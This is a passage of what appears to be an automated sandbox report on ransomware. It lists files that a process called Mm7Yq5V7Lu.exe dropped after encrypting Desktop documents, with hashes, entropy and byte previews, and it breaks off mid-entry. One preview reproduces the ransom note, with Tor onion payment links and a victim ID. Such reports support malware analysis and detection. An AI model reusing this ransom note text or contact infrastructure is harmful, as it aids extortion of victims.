                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:48:o8QPMyxnE/4NAcTaG/jCpGGTzU61/zCwgck38A/:o8Q0yxEM59sGi/zTEb
                                                                                                                                                      MD5:8B324AB6F6FF114B700C55A2428738B2
                                                                                                                                                      SHA1:224A042118535F7B1D6900D7FB5FA559EEAA207B
                                                                                                                                                      SHA-256:1FACBA1FDA8BC1D30EF23B9385F3D77EDDFF1BA86FEDC09DA70B60068DFB95E6
                                                                                                                                                      SHA-512:74D0F2B481BD37E576547B99B204B485B04434BDD82F23629F6C5C948A45964288F15ACA4A61DE822891FCF917D13616FBFB8DA9336B05D5F5F655C121441DAD
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: ..ul;.[.S.4.@.<4.o...n..2....x.*r...&../...S(:}2u.Y.zf........f.-..`Ox.;..o..6..qg. .......z..l{..5l.J....N.x...%.g.....P...tO..UB...v....TPd.(e.)J..N.'...`M.H...U..F....5.yx.U.x.\.$M..3....&M8..dD.C.......18[..l.DGt.AX./....;...Dz.s.A@cf>,J.a.(..lJ......C..Z..4.OSx..#.....-.y9._.......+.E.......K{.XD...B.....bF......l....7....59.b..'L.Z.......^.3j%y.........Lt.!.+$....Y..B...YfYo...#.i..A .}O%M...5>...T....h.8..vh.0..@...F.g.|7....=...xy..A..L$.VN....Z.d%.8.H........~I.......YI.y.F._.Z...h....E..{....gW.....?C..:.D.z..'.`..)...vY..._..`.s.......O.=$.iGh..p..E..O.Uf;..j>.. c..\.].....PT.s..|1..64naHF.....W.......[$....H..^;..g..|.A)eUE.s>....Utf.h...:^..vavV9....K..Rh....I1?.A.X....Li.....ABVP.....=..-J.>.|?.d.....|Bz.9O.l+Kv.t.A.....K......c..]...#.....*Z.7m..M.N....>vp.......C..$...gnT.e.....+"x..J'D0......2a..u...f..Nd:...p..B.T.._....GM1.._.......|w...}....u.cA|..!...r..3@.c0...P. -;.......~.:...........".[^M.<............D.im.^.:.g8.
                                                                                                                                                      C:\Users\user\Desktop\NVWZAPQSQL\GRXZDKKVDB.xlsx
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1984
                                                                                                                                                      Entropy (8bit):7.022075553922525
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:48:8cas/fOuFWqQsTEOzdyZ69SzCwgck38zI3:8cas/GuYqxTEGm69SzTE2y
                                                                                                                                                      MD5:7AF9E20A6124FCE89727A5EF51FFA074
                                                                                                                                                      SHA1:33F9ADF8994097560FD08E30401317D46B614592
                                                                                                                                                      SHA-256:4288FA86D94A0F247B92EA8F8F6D8279E7B7434738C45144183A6F08FF150885
                                                                                                                                                      SHA-512:751C9AD33D62F693E4AE8A48DDB4D0734AA0067EB216CA49D8961731357A97A6A90546312BFCD09B2FDA085CBC97582DC24929320ED367D09BF781147DB6927F
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: ....5.9~...bM....`Os....r.u..*C.<Mc.q9..a...s..O^gt..%\.cR.`....U.$....`.S......E..f$a.RVL....UV.m#..............SdC9.1IU.....t.}0.."d.:.......e(O"|...{...n..i...ks...G.O..h......V.%..v.g........YDT@...@.Aa.........v.f.....4...r..red.J>.}Fb0.96z@.......%..b..3..,.i....[.K.[D..0oy>...........X1.9-..M..L.p.l..1'a.....P.LJ......Xv....t......_.rj}..[.#>..;.......)(.......b..u.....*<...[.c>F&H...........!.....3L8........2;g_...d..6.?.c.`..,1].(.......?......[.........6..+.Z.@.j.@.j.C<......@.R......7(.~...N.lW.....S....([U.b..Wa...`...%._V.3..y...W..O....JF..om..3.G...r...).C<.60."...E.....hR..2.J.~.f..v.8z.Q........t..r.....*...x.q..b.T.:g...u.V....p..l!:%....5....n.QPRu V>..8....mf. Q9\...BL.... |N0........~7....7...}.g....l(..+.Q}.Eq...r.;....".K,..}Lr.o.Cy...'@...M..9.{........]4.C..I....D..c...".....i*.Y..H.t. ..w....%..9...n..C....N....o.M+o.]....&.....U.1M&.n..y.Jg...Gs....}w..v?Q(...-...k.....=c^..`.h.w....I@.S.'.3q.3z,...0...... B.
                                                                                                                                                      C:\Users\user\Desktop\NVWZAPQSQL\GRXZDKKVDB.xlsx.xls (copy)
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1984
                                                                                                                                                      Entropy (8bit):7.022075553922525
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:48:8cas/fOuFWqQsTEOzdyZ69SzCwgck38zI3:8cas/GuYqxTEGm69SzTE2y
                                                                                                                                                      MD5:7AF9E20A6124FCE89727A5EF51FFA074
                                                                                                                                                      SHA1:33F9ADF8994097560FD08E30401317D46B614592
                                                                                                                                                      SHA-256:4288FA86D94A0F247B92EA8F8F6D8279E7B7434738C45144183A6F08FF150885
                                                                                                                                                      SHA-512:751C9AD33D62F693E4AE8A48DDB4D0734AA0067EB216CA49D8961731357A97A6A90546312BFCD09B2FDA085CBC97582DC24929320ED367D09BF781147DB6927F
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: ....5.9~...bM....`Os....r.u..*C.<Mc.q9..a...s..O^gt..%\.cR.`....U.$....`.S......E..f$a.RVL....UV.m#..............SdC9.1IU.....t.}0.."d.:.......e(O"|...{...n..i...ks...G.O..h......V.%..v.g........YDT@...@.Aa.........v.f.....4...r..red.J>.}Fb0.96z@.......%..b..3..,.i....[.K.[D..0oy>...........X1.9-..M..L.p.l..1'a.....P.LJ......Xv....t......_.rj}..[.#>..;.......)(.......b..u.....*<...[.c>F&H...........!.....3L8........2;g_...d..6.?.c.`..,1].(.......?......[.........6..+.Z.@.j.@.j.C<......@.R......7(.~...N.lW.....S....([U.b..Wa...`...%._V.3..y...W..O....JF..om..3.G...r...).C<.60."...E.....hR..2.J.~.f..v.8z.Q........t..r.....*...x.q..b.T.:g...u.V....p..l!:%....5....n.QPRu V>..8....mf. Q9\...BL.... |N0........~7....7...}.g....l(..+.Q}.Eq...r.;....".K,..}Lr.o.Cy...'@...M..9.{........]4.C..I....D..c...".....i*.Y..H.t. ..w....%..9...n..C....N....o.M+o.]....&.....U.1M&.n..y.Jg...Gs....}w..v?Q(...-...k.....=c^..`.h.w....I@.S.'.3q.3z,...0...... B.
                                                                                                                                                      C:\Users\user\Desktop\NVWZAPQSQL\NVWZAPQSQL.docx
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1984
                                                                                                                                                      Entropy (8bit):7.026841434151015
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:48:hvNrlf+RHrzoH/y/p5uEhX9BNpu3zCwgck386:5f2LzY/oL9ByzTEt
                                                                                                                                                      MD5:06285C54F663B25A8B7860BB1F3321B7
                                                                                                                                                      SHA1:00B98E136B1927DF165A5DD72DAEE81B4AD2612F
                                                                                                                                                      SHA-256:142A1F8DFE5241E048C1C761B0DAFCD601FD5A7FC9708B5598DC047965129B82
                                                                                                                                                      SHA-512:8DFDF6ACA42351466AFC77CBE8C16E15F2051E5C0F8A869256F694D48B9D246723E262F3AEFB8563C16C024AB5090D582FD5A9CC0202CF41BC0F35195521829A
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: n...B...g...m'..S.$oJ..../)..c#.+.<_..pW.*DA#...[.>.T.w;ES.s.R.....>...e.m.00.;.!..?CS...;..Z1...]...~a.!Vbb.#.h...:.m.9.z.....H.#o6...D.RT.,.Z`..&....i...f.lm..k..r.%..W....:..:..v...K.OO..C...Hs.F.......h.V.[c.Z_.9.k..4A.fw..aD0m.1.I...v..L."..x..h.....l.Tm?v...O.0$$.."...z....\.1..%dg.......=..A..&.......^5/%".^...X.'^.|u.W....Q..:s...Y...3......5n.....|..A!....)..w..>u...2jx.Y.....:K'P2.r.q......&.4.....)...]..T......n..K.....)J..n..5~..M71LW.\H..J.........n./...5<..x..?..l4...}G.6/..O&w.(.7..Y....q....o..o..*....m...&T.q.]..=..$...=S...G!..-.y.A.tv.q...od'1.f*....K..&^W...J.u......-.."{..Z...4h..^......C...4..B....!..Wn....3............-..6..].........2g..O.r.o.P|;...Z<.>..._.:4..#..-..O.".n.f..xy..e...5...wk...*.z.D.3...(. siH.+..N...I..W4g<.l......a..$.8.'...B.Q...4..P..o.vN.vJ.7u.l......?.z_T..8..Jb.]...Y..e.WN.gtL...tE..u(..6.Y..G.U?..........p.y=..:..PX.O.....%.C.X...7..............9&..T......*.[mD...WL.&..%...u
                                                                                                                                                      C:\Users\user\Desktop\NVWZAPQSQL\NVWZAPQSQL.docx.xls (copy)
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1984
                                                                                                                                                      Entropy (8bit):7.026841434151015
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:48:hvNrlf+RHrzoH/y/p5uEhX9BNpu3zCwgck386:5f2LzY/oL9ByzTEt
                                                                                                                                                      MD5:06285C54F663B25A8B7860BB1F3321B7
                                                                                                                                                      SHA1:00B98E136B1927DF165A5DD72DAEE81B4AD2612F
                                                                                                                                                      SHA-256:142A1F8DFE5241E048C1C761B0DAFCD601FD5A7FC9708B5598DC047965129B82
                                                                                                                                                      SHA-512:8DFDF6ACA42351466AFC77CBE8C16E15F2051E5C0F8A869256F694D48B9D246723E262F3AEFB8563C16C024AB5090D582FD5A9CC0202CF41BC0F35195521829A
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: n...B...g...m'..S.$oJ..../)..c#.+.<_..pW.*DA#...[.>.T.w;ES.s.R.....>...e.m.00.;.!..?CS...;..Z1...]...~a.!Vbb.#.h...:.m.9.z.....H.#o6...D.RT.,.Z`..&....i...f.lm..k..r.%..W....:..:..v...K.OO..C...Hs.F.......h.V.[c.Z_.9.k..4A.fw..aD0m.1.I...v..L."..x..h.....l.Tm?v...O.0$$.."...z....\.1..%dg.......=..A..&.......^5/%".^...X.'^.|u.W....Q..:s...Y...3......5n.....|..A!....)..w..>u...2jx.Y.....:K'P2.r.q......&.4.....)...]..T......n..K.....)J..n..5~..M71LW.\H..J.........n./...5<..x..?..l4...}G.6/..O&w.(.7..Y....q....o..o..*....m...&T.q.]..=..$...=S...G!..-.y.A.tv.q...od'1.f*....K..&^W...J.u......-.."{..Z...4h..^......C...4..B....!..Wn....3............-..6..].........2g..O.r.o.P|;...Z<.>..._.:4..#..-..O.".n.f..xy..e...5...wk...*.z.D.3...(. siH.+..N...I..W4g<.l......a..$.8.'...B.Q...4..P..o.vN.vJ.7u.l......?.z_T..8..Jb.]...Y..e.WN.gtL...tE..u(..6.Y..G.U?..........p.y=..:..PX.O.....%.C.X...7..............9&..T......*.[mD...WL.&..%...u
                                                                                                                                                      C:\Users\user\Desktop\NVWZAPQSQL\PALRGUCVEH.pdf
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1984
                                                                                                                                                      Entropy (8bit):7.056905827682088
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:48:DATxAwp+kPcthr7afhvNEWbIYDzCwgck385:UFAwsTr7a3aizTEe
                                                                                                                                                      MD5:EED5A838AAF466E0D248A55EDF879D01
                                                                                                                                                      SHA1:88E68AF3FCE80D6856AAA1EF170E017E72AAE1E6
                                                                                                                                                      SHA-256:710C70E28C56B965B369CB7375CBC6E4C328C74FA84726FDC8E1EB9580128645
                                                                                                                                                      SHA-512:A35D177D5C3ACDEA490E5D61249C5E7F2D7A92E176AE894EB212C9BF11963D1BA8E344D49A2CE00353A41A7232137551A8CFEC972719DCA8ACF98213BBEFF986
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: XV.m..8.N_....>....T.j[.f$....nO.5H..:Z..<>_x.<RQ....p..L.B..*#M...D....sZ..'...`.%.a>T"t=a.._.d{........I....u.....i.u....U....}..}...j..Cl.z.....p.o........0Z.].QJ...3..M...2<.......'..z53E.O.St.x.gz.?..).;.$#.%...c.a...2.-.5.V...A.wD.~...r........R...#.i......jZ..E.../-..HA.76U..c.....&b..e.>.Lw...5L.|.Mm...kR.[6^z..k...H.sC.p....`...a.a...r...y.xZ_...kT#.?.U............O...3.M......#...n._.T6n......".Nn5!.\.pF....>4..a$......\_.,......$9.\..a.X.....I#....;.Q..J4...dU...Z'.@..9..E.l...+dz.+....5.o.#........^.e.8..tLS....S.k.B....(.l...Q<.[e]+.i0cJ.....d..hA...:.Y..V.U.......$M.@l..C..|...:..N..l..DR.....'..pY.[......U$.tv.N...0Yp..x..L..X.n.F.%.r...w..E.n...F.e...t..N.ej.B..?.UN.7................. .......B..k.j...........X~...%..u..."...%5m..6.N.a..,....i...(K.z.&...!8$.f...v.....O.......g.g..f.M.#.#........LJ.$H.g...&t...kb........7..e_;:8(..@.>......r......_#..........:f.<..q.+Y@......ev....la....:......h.K}.f.&.{.M......-...b!G)-.h
                                                                                                                                                      C:\Users\user\Desktop\NVWZAPQSQL\PALRGUCVEH.pdf.xls (copy)
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1984
                                                                                                                                                      Entropy (8bit):7.056905827682088
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:48:DATxAwp+kPcthr7afhvNEWbIYDzCwgck385:UFAwsTr7a3aizTEe
                                                                                                                                                      MD5:EED5A838AAF466E0D248A55EDF879D01
                                                                                                                                                      SHA1:88E68AF3FCE80D6856AAA1EF170E017E72AAE1E6
                                                                                                                                                      SHA-256:710C70E28C56B965B369CB7375CBC6E4C328C74FA84726FDC8E1EB9580128645
                                                                                                                                                      SHA-512:A35D177D5C3ACDEA490E5D61249C5E7F2D7A92E176AE894EB212C9BF11963D1BA8E344D49A2CE00353A41A7232137551A8CFEC972719DCA8ACF98213BBEFF986
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: XV.m..8.N_....>....T.j[.f$....nO.5H..:Z..<>_x.<RQ....p..L.B..*#M...D....sZ..'...`.%.a>T"t=a.._.d{........I....u.....i.u....U....}..}...j..Cl.z.....p.o........0Z.].QJ...3..M...2<.......'..z53E.O.St.x.gz.?..).;.$#.%...c.a...2.-.5.V...A.wD.~...r........R...#.i......jZ..E.../-..HA.76U..c.....&b..e.>.Lw...5L.|.Mm...kR.[6^z..k...H.sC.p....`...a.a...r...y.xZ_...kT#.?.U............O...3.M......#...n._.T6n......".Nn5!.\.pF....>4..a$......\_.,......$9.\..a.X.....I#....;.Q..J4...dU...Z'.@..9..E.l...+dz.+....5.o.#........^.e.8..tLS....S.k.B....(.l...Q<.[e]+.i0cJ.....d..hA...:.Y..V.U.......$M.@l..C..|...:..N..l..DR.....'..pY.[......U$.tv.N...0Yp..x..L..X.n.F.%.r...w..E.n...F.e...t..N.ej.B..?.UN.7................. .......B..k.j...........X~...%..u..."...%5m..6.N.a..,....i...(K.z.&...!8$.f...v.....O.......g.g..f.M.#.#........LJ.$H.g...&t...kb........7..e_;:8(..@.>......r......_#..........:f.<..q.+Y@......ev....la....:......h.K}.f.&.{.M......-...b!G)-.h
                                                                                                                                                      C:\Users\user\Desktop\NVWZAPQSQL\read-me.txt
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1440
                                                                                                                                                      Entropy (8bit):4.671361883788439
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:TyXWIBdatU+fZe1xzK8sevWAVgKTaCB7RZ0cHYIgtyUzn:Tl9U+fZe1xzCwgck38m
                                                                                                                                                      MD5:755028F7946D7FD0DF47A1AD5961143A
                                                                                                                                                      SHA1:89FF5F39E0E019A2C2068AE638C724711BABEE2D
                                                                                                                                                      SHA-256:A60B3DCDD12428D4683AD9E0434DDB915A9FDAE3DE6D5587D2FDA437BE7770F8
                                                                                                                                                      SHA-512:968C15F6358F2EDF5A47D842EEEB6D3B31BFEEEC5AE308F0C221FEB0648C44CFD1F64C6868DABEB5103D17149726921DEFF964A60213E05BBFE410FA05796957
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: All your files are Encrypted!..For data recovery needs decryptor...How to buy decryptor:..----------------------------------------------------------------------------------------....| 1. Download Tor browser - https://www.torproject.org/ and install it.....| 2. Open link in TOR browser - http://mmeeiix2ejdwkmseycljetmpiwebdvgjts75c63camjofn2cjdoulzqd.onion/?STAHYJUHGFV.. ..| 3. Create Ticket....----------------------------------------------------------------------------------------....Note! This link is available via Tor Browser only.....------------------------------------------------------------..or..http://helpqvrg3cc5mvb3.onion/....Your ID.......67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 3
                                                                                                                                                      C:\Users\user\Desktop\PALRGUCVEH.mp3
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1984
                                                                                                                                                      Entropy (8bit):7.01110580029775
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:48:1RsXXx9+Z/YDlwMWSDXvJLJUufxp4zCwgck38Q7j:1RsXr+ZwDlwTSr7xP4zTEb/
                                                                                                                                                      MD5:7F21C302DE674BE0D283C4BD03FE41FE
                                                                                                                                                      SHA1:0811B834A801160529272585453FC2DEDBA4C940
                                                                                                                                                      SHA-256:D33C353057D34EC1C9601D44510296EC6B32BB1CCD829C32A9A1014955513C74
                                                                                                                                                      SHA-512:894568510FEA81F25BDAC9149E4A46F685B7463676373CF8C0FABA67B07EE084A7A8F00352EF2401C18050BA20C463ABE28ED5240A0FA8C4924AFBE64E630F62
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: .....R..Y!.<.VS....dA...B_....K..~7..+..1`[6..T...{.......x.W....Y..E...=.~...h2.'S...C...~........I[..=>K..J..`.O..M..,ZZ..../x...X...t..J...s._.i.J.~..SiV;X&.!.$......D..6V...F:...?.TnG.......>..E..=........7........S. ...5.`...%..>:v.....Mv....W...!..a7.pb..i.%C..S...F..9.......A..nJ. ..#eh#`...0.Wq.Mvh9..X..T,..q..{~.[.....q.u.=.Qk..r..8.o_.p.h.@..V...fD/.-\zE/.../o.:O..yXK."..#.G.b[.Z.6..-L9.c..p......=....6&.-.<.?3...vhY.p....M2l:k.M.)\....!..8X..............H..a1..U..k....o.SWD0})..5.....H..-;zr..$]U6.|AO....r~w......o.[..y.!.UZ...po.i:)v.W.,h.h.>.CcYT.KgY..!...\7.9.7..>.............,..L.....,..r.E.y........j`.*.>.....1..u.=...oA..Q....3..>.Q...%..~A,............6.Y.....2Z......W....1..q.B|.I.b...WlS....}_..)Q..M......j....mao.QA......u.B....x1..%..n......)...."........5Q4....E6..#...!3..........5e.^.V...e.*l......#U}.\...g.B.^.%..l.>e.".a.@O\.!....A/.K...........W...D.y.F%........s.F.H[.X10s.Z r.............K....-...D...+._..
                                                                                                                                                      C:\Users\user\Desktop\PALRGUCVEH.mp3.xls (copy)
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1984
                                                                                                                                                      Entropy (8bit):7.01110580029775
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:48:1RsXXx9+Z/YDlwMWSDXvJLJUufxp4zCwgck38Q7j:1RsXr+ZwDlwTSr7xP4zTEb/
                                                                                                                                                      MD5:7F21C302DE674BE0D283C4BD03FE41FE
                                                                                                                                                      SHA1:0811B834A801160529272585453FC2DEDBA4C940
                                                                                                                                                      SHA-256:D33C353057D34EC1C9601D44510296EC6B32BB1CCD829C32A9A1014955513C74
                                                                                                                                                      SHA-512:894568510FEA81F25BDAC9149E4A46F685B7463676373CF8C0FABA67B07EE084A7A8F00352EF2401C18050BA20C463ABE28ED5240A0FA8C4924AFBE64E630F62
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: .....R..Y!.<.VS....dA...B_....K..~7..+..1`[6..T...{.......x.W....Y..E...=.~...h2.'S...C...~........I[..=>K..J..`.O..M..,ZZ..../x...X...t..J...s._.i.J.~..SiV;X&.!.$......D..6V...F:...?.TnG.......>..E..=........7........S. ...5.`...%..>:v.....Mv....W...!..a7.pb..i.%C..S...F..9.......A..nJ. ..#eh#`...0.Wq.Mvh9..X..T,..q..{~.[.....q.u.=.Qk..r..8.o_.p.h.@..V...fD/.-\zE/.../o.:O..yXK."..#.G.b[.Z.6..-L9.c..p......=....6&.-.<.?3...vhY.p....M2l:k.M.)\....!..8X..............H..a1..U..k....o.SWD0})..5.....H..-;zr..$]U6.|AO....r~w......o.[..y.!.UZ...po.i:)v.W.,h.h.>.CcYT.KgY..!...\7.9.7..>.............,..L.....,..r.E.y........j`.*.>.....1..u.=...oA..Q....3..>.Q...%..~A,............6.Y.....2Z......W....1..q.B|.I.b...WlS....}_..)Q..M......j....mao.QA......u.B....x1..%..n......)...."........5Q4....E6..#...!3..........5e.^.V...e.*l......#U}.\...g.B.^.%..l.>e.".a.@O\.!....A/.K...........W...D.y.F%........s.F.H[.X10s.Z r.............K....-...D...+._..
                                                                                                                                                      C:\Users\user\Desktop\PALRGUCVEH.pdf
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1984
                                                                                                                                                      Entropy (8bit):7.018634400962143
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:48:Y8xMA60/7s38N/hb95L1WGDh+zCwgck383r:YuMAtw38N/hXLJD4zTEQ
                                                                                                                                                      MD5:565643CE990C685B4B4132A8BBC8C205
                                                                                                                                                      SHA1:F2794DE9C4DDBCE3AEEBC4B3AD36FA4EF7EC63A0
                                                                                                                                                      SHA-256:15E3292D3EE804A244511B69C5E7E957EAFCEAF340FAAD8F1EDD623483D4D9FF
                                                                                                                                                      SHA-512:77386C063FC07065D57197826195B66DEA1880B45EAF9960E49CD34DD86F5C9847E813CE61C72BC2A057281BEA77685ACEF9E6708081A3EAC17225D69EB52765
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: l.,g.p.Jkb..........7.j!..P!....U...6..o{.z.!.x.....i1..0....9&83W.Y..k.....2~..Z..{^.wa..z$....cS......U...Ux...g...v..g.b.A!......t:.....6.e8$..v..2......!-&.y..I...:H..f.n..9.k19.,........C..or...ZW4.8..j..`;.V...n.?.!...6...w.m...p..&g}...%.h.0.=..g...ra... 7...3.;....m../...p...F.I..$.6.........s.~....m. /i.e.:n..j..gg......0.w...^,N.huH.>..a....*.y.w..*..%v..,...g.V.JRO....mDexn....z.6......[$7nm.......{.Z...".F...I.V..]..C....m....V..`..~.B.U>. ..a.'.gC.s.dQ..........;.PTk......%6r<?.9V..4e.i.g.@3N*.w.u.=......%....5..w..,|......V1zV,=..46...U.DE)K~;.N#_+*...m!Y.}.....=MLi.....X.t..sT..o.1..p.5.j....{.e.............u..Wi^..S.R..]P=...B.S..dr.......z.....\eR...+...e..d...^sS.8.@5..9..,o..<;+....l...&A.^F.@...>...?..!]\...~O......_..JG..&7&........*[....b4x...A ....=2..0..r)!.!a..A..@o..B.jz.b..~7...{....(..m.....L...<`...xP".$C.|..Ns.@.j..>.-..8...`....#.).J....6.vV.\.aF#@..rV1..8...P<....'7........~.H..)....M.`.Y..P...Y....u..B
                                                                                                                                                      C:\Users\user\Desktop\PALRGUCVEH.pdf.xls (copy)
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1984
                                                                                                                                                      Entropy (8bit):7.018634400962143
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:48:Y8xMA60/7s38N/hb95L1WGDh+zCwgck383r:YuMAtw38N/hXLJD4zTEQ
                                                                                                                                                      MD5:565643CE990C685B4B4132A8BBC8C205
                                                                                                                                                      SHA1:F2794DE9C4DDBCE3AEEBC4B3AD36FA4EF7EC63A0
                                                                                                                                                      SHA-256:15E3292D3EE804A244511B69C5E7E957EAFCEAF340FAAD8F1EDD623483D4D9FF
                                                                                                                                                      SHA-512:77386C063FC07065D57197826195B66DEA1880B45EAF9960E49CD34DD86F5C9847E813CE61C72BC2A057281BEA77685ACEF9E6708081A3EAC17225D69EB52765
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: l.,g.p.Jkb..........7.j!..P!....U...6..o{.z.!.x.....i1..0....9&83W.Y..k.....2~..Z..{^.wa..z$....cS......U...Ux...g...v..g.b.A!......t:.....6.e8$..v..2......!-&.y..I...:H..f.n..9.k19.,........C..or...ZW4.8..j..`;.V...n.?.!...6...w.m...p..&g}...%.h.0.=..g...ra... 7...3.;....m../...p...F.I..$.6.........s.~....m. /i.e.:n..j..gg......0.w...^,N.huH.>..a....*.y.w..*..%v..,...g.V.JRO....mDexn....z.6......[$7nm.......{.Z...".F...I.V..]..C....m....V..`..~.B.U>. ..a.'.gC.s.dQ..........;.PTk......%6r<?.9V..4e.i.g.@3N*.w.u.=......%....5..w..,|......V1zV,=..46...U.DE)K~;.N#_+*...m!Y.}.....=MLi.....X.t..sT..o.1..p.5.j....{.e.............u..Wi^..S.R..]P=...B.S..dr.......z.....\eR...+...e..d...^sS.8.@5..9..,o..<;+....l...&A.^F.@...>...?..!]\...~O......_..JG..&7&........*[....b4x...A ....=2..0..r)!.!a..A..@o..B.jz.b..~7...{....(..m.....L...<`...xP".$C.|..Ns.@.j..>.-..8...`....#.).J....6.vV.\.aF#@..rV1..8...P<....'7........~.H..)....M.`.Y..P...Y....u..B
                                                                                                                                                      C:\Users\user\Desktop\Word 2016.lnk
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):3616
                                                                                                                                                      Entropy (8bit):7.600911229862242
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:96:prVzs0QMi7MPD1qxE41ZQ9w8inUNyzTE1:9Vg0iIPDQxE+CwJnUNiQ
                                                                                                                                                      MD5:36951824774D2DAB79D510F6B50E8E17
                                                                                                                                                      SHA1:B0F6A696548496E16A3C5AB3C57D482FC28711B4
                                                                                                                                                      SHA-256:A9116B1FF50E1421A66BE76F7A59B3E3CA85BF2897001D8722DB9F6F7736500A
                                                                                                                                                      SHA-512:164E9C77441902A82AEDD36796C98BA44770CA0026C97B0A429C9D108037F7CC911722180B91A073E8351BDBEE7804413E926E98037D40CE0FEAA034BFCE527F
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: m`....6.....kgj..-......`.Z..3...../C.......r..[...1a..n...V.....-...<..a..Sy.....u.....\...F..E..E,L/._.....J....X..,4...._g_.?(.V6...t..{,@...X{%x|eW]3V/..\1.K...}.....}...a...G...?......qPY5.:t.........{Pt.%.R..1.khp..."s.0).bW^?..7D:..e.D,.tJ3..Ow)7.....A..hL.o..)Y..;>..).^..<!%.W....NZ.].YC.&un%.ub....w.`......Y..C0..h.......4.....0:.%..............J>....Z,...g.1e.z...!.wcdO..d.k]n..BI...%...$...t..x.qX.5`..t.$..zq.|..L./.....S"<.0E...ZN...m.M.....v#...K.#9...0.q.v.$1..|.~.m.....$.+.'....ZO.6.....X1.......T:..&1...s....E....Qpp.(..|...r...Y.-a}G..A.P.'Xbr9..U {.T..V_..gs.../...>.....8"/0.....<.h.._l..V...8..J$..Mv.l......:...3...h..bB.....N...*pNV...g#...).@y...V.$.'....7....7B.t.......0...:S..a.....->S=......p.^VN.P_n...e%/^....e.o.............W."+C....H/.".q.Z.)..<.G...J~.=.=t..T.].W...Q@.>.G...S......&.p.B...V...5..........:.]p.K@N.P'..M.i.X.>x6..J........W..#K..yX7...7..C.R...Z.^he...H..8....../*.g..Vq..H.X.x.n..m.*(..10.Sr6.
                                                                                                                                                      C:\Users\user\Desktop\Word 2016.lnk.xls (copy)
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):3616
                                                                                                                                                      Entropy (8bit):7.600911229862242
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:96:prVzs0QMi7MPD1qxE41ZQ9w8inUNyzTE1:9Vg0iIPDQxE+CwJnUNiQ
                                                                                                                                                      MD5:36951824774D2DAB79D510F6B50E8E17
                                                                                                                                                      SHA1:B0F6A696548496E16A3C5AB3C57D482FC28711B4
